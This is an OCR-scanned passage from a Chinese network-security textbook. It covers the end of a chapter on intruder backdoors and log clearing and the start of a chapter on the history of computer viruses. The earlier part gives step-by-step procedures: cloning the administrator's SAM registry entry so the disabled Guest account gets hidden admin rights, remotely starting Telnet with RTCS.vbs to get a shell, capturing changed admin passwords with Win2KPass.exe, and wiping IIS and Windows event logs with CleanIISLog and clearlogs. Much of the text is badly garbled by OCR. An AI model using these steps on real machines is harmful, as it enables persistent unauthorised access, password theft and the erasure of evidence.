账号 永远 是 系统 敞开 的 大 门 。 入 侵 者 为 了 能 够 永远 控制 远程 主机 ， 会 在 入 侵 成 功 后 便 
马上 在 远程 主机 上 建立 一 个 备用 的 管理 员 账 号 ， 这 种 账号 就 是 最 简单 的 后 门 。 对 于 这 种 后 
门 ， 不 但 有 密码 过 期 的 麻烦 ， 而 且 管 理 员 只 要 稍微 细心 些 ， 都 会 轻易 地 发 现 这 些 账号 。 
例 7-1 让 禁用 的 Guest 具有 管理 权限 。 
操作 系统 所 有 的 用 户 信息 都 保存 在 注册 表 中 , 但 是 如 果 直 接 使 用 regedit 命令 打开 注册 
该 键 值 是 隐藏 的 ， 如 图 7-1 所 示 。 


加 


站 


EE =|D| x| 


: Ei 

田园 HKEY_CLAS5E5_ROOT (数值 未 设置 ) 

田 和 外) HKEY_CURRENT_USER 

日 和 外 HKEY_LOCAL_MACHINE 
国 HARDWARE 


NL 


图 7-1 隐藏 的 SAM 键 值 


可 以 利用 工具 软件 psu.exe 得 到 该 键 值 的 查看 和 编辑 权 。 将 psu.exe 拷贝 至 对 方 主机 的 
C 盘 下 ， 并 在 任务 管理 器 查看 对 方 主机 winlogon.exe 进程 的 ID 号 或 者 使 用 pulist.exe 文件 
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同 径 后 /与 涝 附 日 志 


克 缘 颁 会 扩大 理论 与 笑 夏 


查看 该 进程 的 儿 号 ， 如 图 7-2 所 示 。 


旦 windows 任务 管理 器 =|D|x| 
文件 (E) 选项 (0) 查看 (W) 帮助 (H) 


应 用 程序 进程 | 性 能 | 
Systen Idle P... 00 0:00:47 16Kk 
System 00 0:00:15 272 Kk 
144 00 0:00:00 360K 
ee ee 196 00 0:00:02 2,656 K 
Services. exe 248 00 0:00:01 5,064K 
1sass, exe 260 00 0:00:00 4,856 k 
svehost. exe 428 00 0:00:00 2,352 K 
spoolsv. exe 468 00 0:00:00 3,232 kK 
msdte exe 500 00 0:00:00 3,320K 
tepsves. exe 616 00 0:00:00 4,064 Kk 
svehost. exe 632 00 0:00:00 4,372 kK 
656 00 0:00:00 1,876K 
00 0:00:00 B84 Kk 
00 0:00:00 1,884 Kk 
0 0:00:00 2,816 K 
00 0:00:00 2,204k 
00 0:00:02 9,028 K 
mM NMMM 2 3nn 区 


感 程 歼 :31 [CPU 使用: 100% | 内 存 使 用 ; 84896K 310800K 。 
图 7-2 ”查看 winlogon.exe 的 进程 号 


该 进程 号 为 192， 下 面 执行 命令 “psu -p regedit -i 192”， 其 中 pid 为 winlogon.exe 的 进 
程 号 ， 如 图 7-3 所 示 。 


:N\?psu -p regedit -i 192 


su 1.01 (Process Super user) for Windows NT/2096 System hdministrator 
reates a process in the context of the other user's security context 
ithout using that user's password. 

(c)2601 . support by batman.lee at 263.net 


图 7-3 执行 命令 
在 执行 该 命令 的 时 候 必须 将 注册 表 关闭 , 执行 完 命令 以 后 , 自动 打开 了 注册 表 编 辑 器 ， 


REG_SZ (数值 未 设置 ) 
REG_BINARY 0200 01 00 00 00 0000 
00 00 00 00 a8 00 0000 


7-4 查看 SAM 键 值 


查看 Administrator 和 Guest 默认 的 键 值 ， 在 Windows 2000 操作 系统 上 ，Administrator 
一 般 为 0x1 僻 ，Guest 一 般 为 0x1 人 三， 如 图 7-5 所 示 。 


EECES 
注册 表 (R) 编辑 (E) 


图 7-5 查看 账户 对 应 的 键 值 


根据 0X1F4 和 0X1F5 找到 Administrator 和 Guest 账户 的 配置 信息 ， 如 图 7-6 所 示 。 


ETE =I9| x 
天 型 数据 
REG_SZ (数值 未 设置 ) 
REG_BINARY 0200010000000000 
REG_BINARY 00 00 00 00 a8 00 00 00 
天 
| 


图 7-6 账户 配置 信息 


在 图 7-6 右边 栏目 中 的 F 键 值 中 保存 了 账户 的 密码 信息 ,双击 000001F4 目录 下 键 值 F， 
可 以 看 到 该 键 值 的 二 进 制 信息 ， 将 这 些 二 进 制 信息 全 选 ， 并 拷贝 出 来 ， 如 图 7-7 所 示 。 


| 了 3 


图 7-7 拷贝 管理 员 配置 信息 


将 拷贝 出 来 的 信息 全 部 覆盖 到 000001F5 目录 下 的 下 键 值 中 ， 如 图 7-8 所 示 。 
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同 经 后 / 门 与 浅 附 日 翅 


克 参 颁 会 其 大 再 座 与 笑 夏 


图 7-8 覆盖 Guest 用 户 的 配置 信息 


这 样 ，Guest 账户 已 经 具有 管理 员 权限 了 。 为 了 能 够 使 Guest 账户 在 禁用 的 状态 登录 ， 
下 一 步 将 Guest 账户 信息 导出 注册 表 。 选 择 User 目录 ， 然 后 选择 菜单 栏 “ 注 册 表 ”下 的 菜 
单项 “导出 注册 表 文件 ”， 将 该 键 值 保存 为 一 个 配置 文件 ， 如 图 7-9 所 示 。 


要 据 

(数值 未 设置) 

02 0001 0000000000 
‘00 00 0000 9c 000000 


REG_BINARY 
REG_BINARY 


图 7-9 保存 键 值 
打开 “计算 机 管理 ”对 话 框 ,并 分 别 删除 Guest 和 00001F5 两 个 目录 ,如 图 7-10 所 示 。 
注册 表 (R) 编辑 (E) 


数据 

(数值 未 设 置 ) 
0200010000000000 
000000009%000000 


图 7-10 删除 Guest 账户 信息 


然后 再 将 刚才 导出 的 信息 文件 再 导入 注册 表 ， 下 面 在 对 方 主机 的 命令 行 下 修改 Guest 


的 用 户 属 性 , 注意 : 一 定 要 在 命令 行 下 。 首 先 修改 Guest 账户 的 密码 ， 比 如 这 里 改 成 hello， 
并 将 Guest 账户 开启 和 停止 ， 如 图 7-11 所 示 。 


C:\WINNT\System32\cmd.exe 
:N>net user guest hello 


命令 成 功 完成 。 


:N?>net user guest /active:yes 
一 
完成 。 


:N>net user guest /actiue:no 


命令 成 功 完成 。 


图 7-11 修改 Guest 账户 的 属性 


再 次 看 “计算 机 管理 ”窗口 中 的 Guest 账户 ， 


[ER 
」 操作 (8) 查看 W || 中 小 | 向 | 加 |X 虹 民 | 名 


发 现 该 账户 是 禁用 的 ， 如 图 7-12 所 示 。 
lolxl 


Internet 来 宾 账号 


管理 计算 机 ( 域 ) 的 内 置 账户 
EREIEISEEW 
匿名 访问 Internet 信息 服务 的 内 ，, 


IUSR_ADSER.,, 

IWAM_AD5E,,， 启动 115 进程 账号 启动 进程 之 外 的 应 用 程序 的 Inter.… 

lly 

TsInternetUser TsinternetUser 这 个 用 户 账户 被 终端 服务 所 使 用 。 
4 划 


图 7-12 查看 Guest 账户 属性 


注销 退出 系统 ， 然 后 用 用 户 名 guest， 密 码 hello 登录 系统 。 不 仅 可 以 登录 ， 而 且 该 账 


户 还 拥有 管理 员 的 权限 。 
2. 系统 服务 后 门 


在 一 次 成 功 的 入 侵 之 后 ， 入 侵 者 会 想 办 法 把 系统 的 Telnet 服务 设置 为 自动 运行 ， 以 便 
于 下 次 登录 。 因 为 这 是 Windows 自 带 的 服务 ， 所 以 杀毒 软件 不 会 给 出 警告 。 


例 7-2 远程 启动 Telnet 服务 。 

利用 主机 上 的 Telnet 服务 ， 有 管理 员 密 码 
就 可 以 登录 到 对 方 的 命令 行 ， 进 而 操作 对 方 的 
文件 系统 。 如 果 Telnet 服务 是 关闭 的 ， 就 不 能 
登录 了 。 

默认 情况 下 , Windows 2000 Server 的 Telnet 
是 关闭 的 ， 可 以 在 运行 窗口 中 输入 tIlntadmn.exe 
命令 启动 本 地 Telnet 服务 ， 如 图 7-13 所 示 。 

在 启动 的 DOS 窗口 中 输入 “4” 启动 本 地 
Telnet 服务 ， 如 图 7-14 所 示 。 


请 溃 入 程序 、 文 件 殉 、 Internet 资源 的 名 
; 理 et 


打开 口 : EE 7 


取消 ”| 浏览 @ | 


图 7-13 启动 Telnet 服务 


同 经 后 /与 浅 附 日 翅 


需 生 恰 


克 乡 委 会 贡 大 理论 与 笑 践 


选 定 C:\WINNT\System32\tintadmn.exe 


icrosoft (R) Windows 2699 (TM) (内 部 版 本 号 2195) 
elnet Server Admin (Build 5.99.99291.1) 


请 在 下 列 选 项 中 选择 一 个 : 


SE 
这 


一 个 选项 的 号 码 [6 - 5] 以 选择 该 选项 : 4 
icrosoft Telnet 服务 ... 


ES 
噩 
> 


图 7-14 启动 本 地 Telnet 服务 


利用 工具 RTCS.vbs 可 以 远程 开启 对 方 的 Telnet 服务 ， 使 用 该 工具 需要 知道 对 方 具有 
管理 员 权 限 的 用 户 名 和 密码 。 在 命令 行 方式 下 使 用 Windows 自 带 的 脚本 宿主 程序 cscript.exe 


调用 脚本 ， 使 用 的 命令 如 下 : 


c:\>cscript RTCS.vbs < 目标 IP> < 用 户 名 > < 密码 > <NTLM 验 证 方式 > <Telnet 服 务 端 口 > 


其 中 NTLM 值 可 取 0，1，2。 

0: 不 使 用 NTLM 身份 验证 。 

1: 先 尝试 NTLM 身份 验证 。 如 果 失 败 ， 再 使 用 用 户 名 
2: 只 使 用 NTLM 身份 验证 。 

空 密码 用 两 个 双 引 号 "表示 。 


使 用 工具 软件 ， 双 击 RTCS.vbs， 然 后 执行 命令 cscript RTCS.vbs 192.168.8.212 
administrator 123456 1 23， 将 对 方 23 端口 打开 。 其 中 cscript 是 操作 系统 自 带 的 命令 ， 
RTCS.vbs 是 该 工具 软件 脚本 文件 ，IP 地 址 是 要 启动 Telnet 的 主机 地 址 ，administrator 是 用 


户 名 ，123456 是 密码 ，1 是 登录 系统 的 验证 方式 ，23 是 Telnet 开放 的 端口 。 


该 命令 执行 时 


根据 网 络 的 速度 ， 需 要 一 段 时 间 ， 开 启 远程 主机 Telnet RD 15 所 示 。 


Ic: Nacript rtcs.ube 192.168.8.212 ee 123456 1 23 
NMicrosoft (R) Windows Script Host Uersion 5 


版 权 所 有 (C) Microsoft Corporation 1996-: 0 保留 所 有 权利 。 


x KKH KRKKKKKKKRKKKKRR RAKRKKKKKRKKKKKKKRKKKKKKKKKKKKKRKRK NRKRRKRKRRKRRRRRRRRRRRRAKKKKKKK 


RTCS v1.19 

Remote Telnet Configure Script, by zzzEURzzz 
Welcome to visite Www.isgrey.com 

Usage: 


cscript C:\rtes.vbe targetIP username passuord NTLMAuthor telnetport 


It will auto change state of target telnet server. 


并 闪光 关头 关 关 闪闪 关 关 关 关 关 闪闪 关 关 关 关 关 关 关 关 关 关 关 关 关 关 关 关 关 关 关 关 关 关 关 关 关 尖 关 关 关 关 关 关 关 关 关 关 关 关 关 关 关 关 关 关 关 关 关 关 关 关 关 尖 关 关 关 关 关 关 关 


Conneting 192.168.8.212... .0KY 


Querying state of telnet seruer....OK! 
Changeing state....Ok! 

Target telnet server has been START Successfully! 

Now, you can try: telnet 192.168.8.212 23, to get a shell. 


图 7-15 开启 Telnet 服务 的 过 程 


远程 开局 Telnet 服务 时 需要 注意 以 下 几 点 : 

(1) 脚本 自动 检查 目标 Telnet 服务 情况 ， 如 果 未 启动 则 启动 它 ， 相 反 就 关闭 。 同 一 个 
命令 执行 两 遍 ， 就 开 / 关 一 次 服务 。 

(2) 关闭 服务 时 也 必须 输入 这 5 个 参数 ， 这 样 可 以 根据 需要 还 原 服 务 设 置 为 默认 值 
CNTLM=2， 端 口 23 )。 

(3) 如 果 Telnet 服务 被 禁用 ， 将 自动 更 改 为 “手动 ”。 

(4) 该 命令 根据 网 络 的 速度 ， 执 行 的 时 候 需要 一 段 时 间 。 

3. 工具 软件 后 门 

例 7-3 记录 管理 员 口 令 修改 过 程 。 

当 入 侵 到 对 方 主 机 并 得 到 管理 员 口 令 以 后 ， 就 可 以 对 主机 进行 长 入 入 侵 了 ， 但 是 一 个 
好 的 管理 员 一 般 每 隔 半 个 月 左右 就 会 修改 一 次 密码 ， 这 样 已 经 得 到 的 密码 就 不 起 作用 了 。 
利用 工具 软件 Win2kPass.exe 记录 修改 的 新 密码 ， 该 软件 将 密码 记录 在 Winnt\temp 目录 下 
的 Config.ini 文件 中 ， 有 时 候 文件 名 可 能 不 是 Config， 但 是 扩展 名 一 定 是 .ini， 该 工具 软件 
有 “自杀 ”的 功能 ， 就 是 当 执行 完毕 后 ， 自 动 删除 自己 。 

首先 在 对 方 操作 系统 中 执行 Win2KPass.exe 文件 ， 当 对 方 主机 管理 员 密 码 修改 并 重启 
计算 机 以 后 ， 就 在 Winnt\temp 目录 下 产生 一 个 Gonfig.ini 文件 ， 如 图 7-16 所 示 。 


| 文件 E) ”编辑 (E) ”查看 W 收藏 (和 ) 工具 (D) 帮助 (H) 


| 后 v 十- 国 | 向 撞 索 马 文 人 夹 迎 克 | 六 中 XX 加 | 国 - 
| 地 址 (0) 站 Temp | 个 转 到 


品 国 因 因 


ID dat4tmp dat48.tmp 


修改 时 间 ; 2011-10-29 12:09 
大 小 : 1.70KB 
属性 ; (正常 ) 


: 配置 设置 大 小 : 1.70 KB 
图 7-16 密码 修改 记录 文件 
打开 该 文件 可 以 看 到 修改 后 的 新 密码 ， 如 图 7-17 所 示 。 


品 Config.ini - 记事 本 


文件 人 编辑 (6 格式 (D) 帮助 (由 


WIN2K 密 码 大 道 当前 版 本 2.4 
2811-18-29 12:89:55 
当前 用 户 密码 : 


User=administrator; Pass=123456; Domain=hDSERUER 


图 7-17 密码 记录 文件 的 内 容 
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同 经 后 /与 浅 附 日 志 


司 经 颁 会 扩大 理 雁 与 笑 嘴 


该 文件 只 有 当 密 码 发 生变 化 时 才 会 产生 ， 可 以 看 到 新 的 管理 员 密 码 是 123456。 
7.2 清除 日 志 


清除 日 志 是 黑客 入 侵 的 最 后 的 一 步 ， 黑 客 能 做 到 来 无 踪 去 无 影 ， 这 一 步 起 到 决定 性 的 
作用 。 
7.2.1 清除 IIS 日 志 

当 用 户 访 问 某 个 IIS 服务 器 以 后 ,无 论 是 正常 的 访问 还 是 非 正常 的 访问 ，IIS 都 会 记录 
访问 者 的 他 地 址 以 及 访问 时 间 等 信息 。 这 些 信息 记录 在 Winnt\System32\logFiles 目录 下 ， 
如 图 7-18 所 示 。 


上 文件 (9 编辑 (查看) 收藏 (8) 工具 (D 和 助 d a 
| 中 扫 小- 固 | 风 扫 索 号 文 伯 夹 迎 历 风 | 品 开 XX 间 | 国 - 
Ewa 习 


| 地 址 @) | 镶 wasvc1 - 他 和 到 | 


器 目 目 入 


jj ex010910,log ex010911,log ex080628,log 
W3SVC1 


选 定 项 目 可 以 查看 其 说 明 。 自 诗 | 自 自 


另 请 参阅 ; ex080707,log ex080722,log ex080723,log ex080724,log 


我 的 文档 
we 到 人 重 自 证 

ex080725,log ex080731,log ex080801,log ex080802,log 加 

|27 个 对 象 lB.09 MB 加 我 多 电脑 友 


图 7-18 IIS 日 志 记 录 


打开 任 一 文件 夹 下 的 任 一 文件 ， 可 以 看 到 IIS 日 志 的 基本 格式 ， 日 志 记 录 了 用 户 访问 
的 服务 器 文件 、 用 户 登录 时 间 、 用 户 的 下 地址 以 及 用 户 浏览 器 以 及 操作 系统 的 版 本 号 ， 如 
图 7-19 所 示 。 


友 ex010909.log - 记事 本 =|D| x| 
文件 (E) 编辑 (E) 格式 (0) 帮助 (H) 


#Software: Microsoft Internet Information Services 5.8 
#Uersion: 1.8 
#Date: 28861-89-89 12:34:85 


#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-u 
28861-89-89 12:34:85 192.168.8.112 - 192.168.8.212 88 GET /index.asp - 286 
2861-89-89 12:34:18 192.168.8.112 - 192.168.8.212 88 GET /list.asp uid=1 2 
2881-89-89 12:34:55 192.168.8.112 - 192.168.8.212 88 GET /index-asp - 286 
2881-89-89 12:34:59 192.168.8.112 - 192.168.8.212 88 GET /list.asp uid=2 2 
2881-89-89 12:35:19 192.168.8.112 - 192.168.8.212 88 GET /index.asp - 288 

地 

LB4 


图 7-19 IIS 日 志 的 格式 


例 7-4 清除 IIs 日 志 。 
使 用 工具 软件 CleanIISLog.exe 可 以 做 到 这 一 点 ， 软 件 使 用 说 明 如 图 7-20 所 示 。 


C:N\tools>cleaniis1og.exe 翌 
CleanIISLog Uer 0.1, by hssassin 2991. All Rights Reserued . 
Usage: CleanIISLog 《LogFile>IK<.>《CleanIP>I《.> 
LogFile - Specify Log File Which You Want Process . 

Specified “ALL” Will Process All Log Files. 
CleanIP - Specify IP hddress Which You Want Clear . 

Specified “.” Will Clean All IP Record. 了 
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图 7-20 CleanIISLog.exe 使 用 说 明 


首先 将 该 文件 拷贝 到 日 志文 件 所 在 目录 , 然后 执行 命令 “CleanIISLog.exe ex031108.log 
192.168.8.112”， 第 一 个 参数 ex031108.log 是 日 志文 件 名 ， 文 件 名 的 后 6 位 代表 年 月 日 ， 第 
二 个 参数 是 要 在 该 Log 文件 中 删除 的 瑟 地 址 ， 也 就 是 自己 的 了 P 地 址 。 先 查找 当前 目录 下 
的 文件 ， 然 后 进行 清除 ， 整 个 清除 的 过 程 如 图 7-21 所 示 。 


:\WINNT\system32\LogFiles\W3SUC1>cleaniislog ex919999.1o9 19 
leanIISLog Uer 0.1, by hssassin 2061. All Rights Reserued . 


-===Step 1:========= 
Stopping Seruice Ww3suc. 
ervice M3suc Stopped . 
Stopping Seruice msftpsuc . 
kervice msftpsuc Stopped. 


EX616969. L06G. . .Done (9966) Records Remoued 


图 7-21 清除 Is 日 志 的 全 过 程 


7.2.2 清除 主机 日志 


主机 日 志 包括 三 类 的 日 志 : 应 用 程序 日 志 、 安 全 日 志和 系统 日 志 。 可 以 在 计算 机 上 通 
过 控制 面板 下 的 管理 工具 下 的 “事件 查看 器 ”查看 日 志 信息 ， 如 图 7-22 所 示 。 

当 非 法 入 侵 对 方 的 计算 机 后 ， 这 些 日 志 同 样 会 记载 一 些 入 侵 者 的 信息 ， 为 了 防止 被 发 
现 ， 也 需要 清除 这 些 日 志 。 

例 7-5 清除 主机 日 志 。 

使 用 工具 软件 clearlogs.exe 可 以 方便 地 清除 主机 日 志 , 首先 将 该 文件 上 传 到 对 方 主机 ， 
然后 清除 这 三 种 日 志 ， 命 令 格式 如 图 7-23 所 示 。 
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2011-10-29 11:39:38 ESENT 
2011-10-29 11:39:24 WinMgmt 
2011-10-29 11:39:13 ESENT 

2011-10-29 11:39:12 ESENT 

2011-10-29 11:39:12 ESENT 

2011-10-29 11:39:12 ESENT 

2011-10-29 11:39:12 ESENT 
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2011-10-29 11:39:11 Tintsw 

2011-10-29 11:39:07 ESENT 

2011-10-29 11:39:06 ESENT 

2011-10-29 11:39:06 ESENT 

2011-10-29 


图 7-22 查看 日 志 


:Ntools>clear10o9s -system 


learLogs 1.0 - (c¢) 20602, Arne Uidstrom (arne.uidstromentse 一 
- http://ntsecurity.nu/toolbox/clearlogs/ 


Usage: clearlogs [\\computername] <-app / -sec / -sys> 
-app = application log 


-sec = security log 
-sys = system 109 


虽 


图 7-23 删除 主机 日 志 命 令 格式 
这 三 条 命令 分 别 清除 系统 日 志 ( 主 要 记录 审核 策略 的 日 志 )、 安 全 日 志 ( 主 要 记录 着 
操作 系统 的 组 件 所 产生 的 日 志 ， 比 如 IS 中 自 带 的 fp 日 志 等 ) 和 应 用 程序 日 志 (记录 了 重 
要 的 应 用 程序 产生 的 错误 和 成 功 信息 )。 命 令 执行 的 过 程 如 图 7-24 所 示 。 


C:\tools’clearlogs -sys 


ClearLogs 1.9 - (c) 2992，hrne Uidstrom (arne.uidstromentse 
~- http://ntsecurity.nu/toolbox/clearlogs/ 


Success: The log has been cleared 
C:\tools>clearlogs -app 


ClearLogs 1.6 - (c) 2092，hrne Uidstrom (arne.uidstromentse 
- http://ntsecurity.nu/toolbox/clearlogs/ 


Success: The log has been cleared 
C:\tools>clearlogs -sec 


ClearLogs 1.0 - (c) 2092，hrne Vidstrom (arne.uidstromentse 
~- http://ntsecurity.nu/toolbox/clearlogs/ 


Success: The log has been cleared 
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图 7-24 清除 系统 日 志 


令 执行 完毕 后 , 再 打开 事件 查看 器 , 发 现 日 志文 件 都 已 经 被 清空 了 , 如 图 7-25 所 示 。 


」 操作 (2) 查看 W || 全 六 | 白 | 因 | 町 国 | 国 


图 7-25 事件 查看 器 


思考 与 练习 


. 留 后 门 的 原则 是 什么 ? 

.如 何 留 后 门 程序 ? 列举 三 种 后 门 程序 ， 并 阐述 原理 及 防御 方法 。 
. 系统 日 志 有 哪些 ? 如 何 清除 这 些 日 志 ? 

. 利用 三 种 方法 在 对 方 计算 机 种 植 后 门 程序 。 


同 经 后 / 门 与 浅 队 日志 


吉 和 办 


第 8 音 计算 机 病毒 的 防治 


本 章 学 习 目 标 : 

。 理解 计算 机 病毒 定义 ; 

了 解 计算 机 病毒 的 起 源 与 发 展 ; 
掌握 计算 机 病毒 的 特征 ; 

了 解 计算 机 病毒 的 危害 ; 

掌握 计算 机 病毒 技术 ; 

掌握 计算 机 病毒 的 检测 与 防范 方法 。 


8.1 计算 机 病毒 概述 


8.1.1 计算 机 病毒 的 定义 

计算 机 病毒 computer virus) 在 《中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 例 》 中 
被 明确 定义 ， 病 毒 指 “ 编 制 者 在 计算 机 程序 中 插入 的 破坏 计算 机 功能 或 者 破坏 数据 ， 影 响 
计算 机 使 用 并 且 能 够 自我 复制 的 一 组 计算 机 指令 或 者 程序 代码 ”。 

在 一 些 资料 中 病毒 也 被 定义 为 : 利用 计算 机 软件 与 硬件 的 缺陷 或 操作 系统 漏洞 ， 由 被 
感染 机 内 部 发 出 的 破坏 计算 机 数据 并 影响 计算 机 正常 工作 的 一 组 指令 集 或 程序 代码 。 

可 以 从 下 面 几 个 方面 来 理解 计算 机 病毒 的 定义 。 首 先 ， 病 毒 是 通过 磁盘 、 磁 带 和 网 络 
等 作为 媒介 传播 扩散 且 能 “传染 ”其 他 程序 的 程序 。 其 次 ， 病 毒 能 够 实现 自身 复制 且 借 助 
一 定 的 载体 存在 ， 具 有 潜伏 性 、 传 染 性 和 破坏 性 。 再 者 ， 计 算 机 病毒 是 一 种 人 为 制造 的 程 
序 ， 它 不 会 自然 产生 ， 是 精通 编程 的 人 精心 编制 的 ， 通 过 不 同 的 途径 寄生 在 存储 介质 中 ， 
当 某 种 条 件 成 熟 时 ， 才 会 复制 、 传 播 ， 甚 至 变异 后 传播 ， 使 计算 机 的 资源 受到 不 同 程序 的 
破坏 。 
8.1.2 计算 机 病毒 的 起 源 与 发 展 


早 在 1949 年 ， 距 离 第 一 部 商用 计算 机 的 出 现 还 有 好 几 年 时 ， 计 算 机 的 先驱 者 冯 。 诺 
依 曼 在 他 的 一 篇 论文 《复杂 自动 机 组 织 论 》， 提 出 了 计算 机 程序 能 够 在 内 存 中 自我 复制 即 
已 把 病毒 程序 的 蓝图 勾勒 出 来 ， 但 当时 ， 绝 大 部 分 的 计算 机 专家 都 无 法 想象 这 种 会 自我 繁 
殖 的 程序 是 可 能 的 ， 可 是 少数 几 个 科学 家 默默 地 研究 汉 “。 诺 依 曼 所 提出 的 概念 ， 直 到 十 年 
之 后 ， 在 美国 电话 电报 公司 (AI&T) 的 贝尔 实验 室 中 ， 三 个 年 轻 程 序 员 道 格拉 斯 。 麦 炊 
莱 、 维 特 。 维 索 斯 基 和 罗 伯 。 英 里 斯 在 工作 之 余 想 出 一 种 电子 游戏 叫做 “ 磁 芯 大 战 ”。 

1975 年 ， 美 国 科普 作家 约翰 。 布 鲁 勒 尔 写 了 一 本 名 为 《震荡 波 骑士 》 的 书 ， 该 书 第 一 


次 描写 了 在 信息 社会 中 ， 计 算 机 成 为 正义 和 那 恶 双方 斗争 工具 的 故事 ， 成 为 当年 最 佳 畅销 
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1977 年 夏天 ， 托 马 斯 。 捷 。 瑞 安 的 科幻 小 说 《P-1 的 青春 》 成 为 美国 的 畅销 书 ， 雄 动 
了 科普 界 。 作 者 幻想 了 世界 上 第 一 个 计算 机 病毒 , 可 以 从 一 台 计算 机 传染 到 另 一 台 计算 机 ， 
最 终 控制 了 7000 台 计 算 机 ， 酿 成 了 一 场 灾难 ， 这 实际 上 是 计算 机 病毒 的 思想 基础 。 

1983 年 11 月 3 日 ， 弗 雷 德 。 科恩 博士 研制 出 一 种 在 运行 过 程 中 可 以 复制 自身 的 破坏 性 
程序 , 伦 。 艾 德 勒 曼 将 它 命名 为 计算 机 病毒 , 并 在 每 周一 次 的 计算 机 安全 讨论 会 上 正式 提出 ， 
8 小 时 后 专家 们 在 VAX11/750 计算 机 系统 上 运行 , 第 一 个 病毒 实验 成 功 ,一 周 后 又 获准 进行 
5 个 实验 的 演示 ， 从 而 在 实验 上 验证 了 计算 机 病毒 的 存在 。80 年 代 起 ，IBM 公司 的 PC 系列 
微机 因为 性 能 良好 ,价格 便宜 ， 逐 步 成 为 世界 微型 计算 机 市 场 上 的 主要 机 型 。 但 是 由 于 IBM 
PC 系列 微型 计算 机 自身 的 弱点 ， 尤 其 是 DOS 操作 系统 的 开放 性 ,给 计算 机 病毒 的 制造 者 提 
供 了 可 乘 之 机 。 因 此 ， 装 有 DOS 操作 系统 的 微型 计算 机 成 为 其 攻击 的 主要 对 象 。 

1986 年 初 ， 在 巴基斯坦 的 拉 合 尔 ， 巴 锡 特 和 阿 姆 杰 德 两 兄弟 经 营 着 一 家 IBM PC 及 其 
兼容 机 的 小 商店 。 他 们 编写 了 Pakistan 病毒 ， 即 Brain。 在 一 年 内 流传 到 了 世界 各 地 ,使 人 
们 认识 到 计算 机 病毒 对 PC 的 影响 。 

1987 年 10 月 ， 在 美国 ， 世 界 上 第 一 例 计 算 机 病毒 (Brian) 被 发 现 ， 这 是 一 种 系统 引 
导 型 病毒 。 它 以 强劲 的 执着 蔓延 开 来 ， 世 界 各 地 的 计算 机 用 户 几 乎 同时 发 现 了 形形色色 的 
计算 机 病毒 ， 如 大 麻 、IBM 圣诞 树 、 黑 色 星期 五 等 。 

1988 年 3 月 2 日 , 一 种 苹果 机 病毒 改作， 这 天 受 感染 的 苹果 机 停止 工作 ， 只 显示 “向 
所 有 苹果 计算 机 的 使 用 者 宣布 和 平 的 信息 ”以 庆祝 苹果 机 生日 。 

1988 年 11 月 3 日 ,美国 6 千 台 计算 机 被 病毒 感染 ， 造 成 mtemet 不 能 正常 运行 。 这 
是 一 次 非常 典型 的 计算 机 病毒 入 侵 计 算 机 网 络 的 事件 ， 迫 使 美国 政府 立即 做 出 反应 ， 国 防 
部 成 立 了 计算 机 应 急行 动 小 组 ， 更 引起 了 世界 范围 的 轰动 。 此 病毒 的 作者 为 罗伯特 。 英 里 
斯 ， 为 当年 23 岁 在 康 乃 尔 大 学 攻读 学 位 的 研究 生 。 

1989 年 ， 全 世界 计算 机 病毒 攻击 十 分 猩 狐 ， 我 国 也 未 能 幸免 ， 其 中 “ 米 开 朗 基 罗 ” 病 
毒 给 许多 计算 机 用 户 造 成 极 大 损失 。 

1991 年 ， 在 “海湾 战争 ”中 ， 美 军 第 一 次 将 计算 机 病毒 用 于 实战 ， 在 空袭 巴格达 的 战 
斗 中 ， 成 功 地 破坏 了 对 方 的 指挥 系统 ， 使 之 瘫痪 ,保证 了 战斗 顺利 进行 ， 直 至 最 后 胜利 。 

1992 年 ， 出 现 了 一 种 叫做 “ 金 蝉 ”(Golden Cicada) 的 病毒 ， 给 病毒 分 类 又 加 了 一 种 
“伴随 型 病毒 ” 这 种 病毒 会 把 原来 的 文件 改名 ， 如 果 原 来 文件 的 扩展 名 是 “EXE”， 那 么 就 
改 成 “COM” 如 果 是 “COM”， 就 改 成 “EXE” 然后 把 自己 改 成 文件 本 来 的 名 字 。“ 金 蝉 ” 
病毒 就 是 利用 了 DOS 的 这 个 特性 , 当 用 户 认为 自己 是 在 运行 一 个 可 执行 文件 的 时 候 , 实际 
上 已 经 运行 了 病毒 。 

1994 年 5 月 ， 南 非 第 一 次 多 种 族 全 民 大 选 的 计 票 工作 ， 因 计算 机 病毒 的 破坏 停止 30 
余 小 时 ， 被 迫 推迟 公布 选举 结果 。 

1996 年 , 出 现 针 对 微软 公司 Office 的 “ 宏 病 毒 ”。1997 年 公认 为 计算 机 反 病毒 界 的 “ 宏 
病毒 年 ”。 

1998 年 , 首 例 破坏 计算 机 硬件 的 CIH 病毒 出 现 , 引起 人 们 的 恐慌 。1999 年 4 月 26 日， 
CIH 病毒 在 我 国 大 规模 爆发 ， 造 成 巨大 损失 。 
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2000 年 5 月 4 日 ， 一 种 称 为 “我 爱 你 ”( 又 称 爱 虫 ) 的 计算 机 病毒 开始 在 全 球 各 地 迅 
速 传 播 。 该 病毒 通过 Microsoft Outlook 电子 邮件 系统 传播 ， 邮 件 的 主题 是 ILOVE YOU， 
并 且 包 含 一 个 附件 。 一 旦 在 Microsoft Outlook 里 打开 了 这 个 邮件 ， 系 统 就 会 自动 复制 并 向 
地 址 德 中 的 所 有 邮件 地 址 发 送 这 个 病毒 。 

2001 年 完全 可 以 被 称 为 “蠕虫 之 年 >。 出 现 的 蠕虫 病毒 不 仅 数量 众多 ， 而 且 危 害 极 大 ， 
感染 了 数 百 万 台 计 算 机 ， 其 中 典型 的 蠕虫 包括 : Nimda 〈 尼 姆 达 )、CodeRed (红色 代码 ) 
和 Badtrans 〈( 坏 透 了 ) 等 。 

2003 年 8 月 12 日， 名 称 为 “冲击 波 ” 的 病毒 在 全 球 袭 击 Windows 操作 系统 ， 据 估计 
可 能 感染 了 全 球 一 两 亿 台 计算 机 ， 在 国内 导致 上 千 个 局 域 网 瘫痪 。 

2005 年 由 中 国 作者 编写 的 “ 灰 饮 子 ”木马 成 为 本 年 度 头号 病毒 ， 它 危害 极 大 、 变 种 极 
多 ， 是 国内 非常 罕见 的 恶性 木马 病毒 。 

2006 年 11 月 至 今 ， 我 国 又 连续 出 现 “ 熊 猫 烧香 ”、“ 仇 英 ”“ 获 妮 ” 等 盗 取 网 上 用 户 
账号 密码 的 病毒 和 木马 ， 病 毒 的 趋 利 性 进一步 增强 ， 网 上 制作 、 贩 卖 病 毒 、 木 马 的 活动 日 
